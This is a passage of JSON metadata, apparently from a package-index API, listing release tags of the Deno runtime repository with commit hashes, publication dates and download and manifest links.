deno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifest